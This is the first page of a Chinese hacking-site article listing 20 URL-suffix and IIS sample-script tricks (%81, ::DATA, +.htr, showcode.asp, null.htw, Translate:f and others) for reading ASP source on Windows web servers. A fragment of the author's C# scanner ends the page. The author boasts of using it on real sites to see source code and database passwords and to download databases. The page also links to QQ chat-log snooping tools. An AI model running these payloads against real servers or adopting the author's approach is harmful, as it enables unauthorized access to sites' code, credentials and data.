20种看asp源码的方法及工具

• 众所周知windows平台漏洞百出，补丁一个接一个，但总是补也补不净。我把我所知道的20种看asp源码的方法总结了一下，并且用c#写了个应用程序来扫描这些漏洞，发现虽然大部分的方法已经不起做用，但还是有一些漏网之鱼的：），结果这两天真看到不少站的源代码，包括数据库密码，如果用Access的可以把库下载下来，而用sql server的如果不是用udl,dsn等来连接的话，也可以通过tcp/ip网络库连接到数据库，为所欲为呀。先面把这20种方法列在下面：
  
  .
  %81
  ::DATA
  %2e
  %2e%41sp
  +.htr
  \\
  longhtr
  .bak
  codebrws.asp
  showcode.asp
  null.htw
  qfullhit.htw
  qsumrhit.htw
  query.idq
  search/qfullhit.htw
  search/qsumrhit.htw
  iirturnh.htw
  .htw
  Translate:f
  
  
  上边这些漏洞前面10几条是通过在asp文件后直接加上，如%81就是xxx.asp%81，后面这些都是通过iis自带的例子或系统漏洞实现的，最特别的是那种translate:f方法，它直接通过浏览器是无法使用的，必须同服务器建立tcp/ip的socket连接，发送请求才行，具体每个漏洞如何使用，看下面，这是我那个应用程序的一部分，如果你要全部的可以到我的站点去下载。
  
                  switch (this.cboMethod.SelectedIndex)
                  {
                      case 0:          //直接读取
                          strRequestFile = strServer + strUrl ;
  
                          break ;
                      case 5 :         //%2e%41sp
                          strRequestFile = strServer + strPath + strFirst
  
• [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 20种看asp源码的方法及工具 相关文章：
• ·p8:电影还是边下边看的好
• ·对面女孩看过来 QQ强制视频聊天
• ·并非笑话:四个让你看了不后悔的故事
• ·ORACLE UPDATE 语句语法与性能分析的一点看法
• ·用上帝之眼看世界：卫星地图全攻略
• ·“芯”要让你看见系列之－－－VIA主板芯片组介绍
• ·XP不够爽!看Vista如何装入苹果MacBook
• ·看看黑客是否光顾过你的电脑
• ·从ACM会议看中国大陆计算机科学与国外的差距-- 灵芯
• ·20种看asp源码的方法及工具
• 20种看asp源码的方法及工具 相关软件
• ·麻将花园连连看
• ·QQ记录查看器 V6.0
• ·阿达连连看
• ·卡巴斯基密钥查看器(KL Key Viewer) V4.0.0.0
• ·电脑录像一看懂 V1.0
• ·局域网查看工具(LanSee) V1.63
• ·QQ聊天记录偷看器 2007第二版
• ·001密码查看器 V1.1B.2007-8-4
• ·QQ在线查看器 V1.8
• ·Windows序列号查看更换工具 V1.70 中文版

上一篇:把IP表存入SQL里的程序

下一篇:生成sessionid和随机密码的例子

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐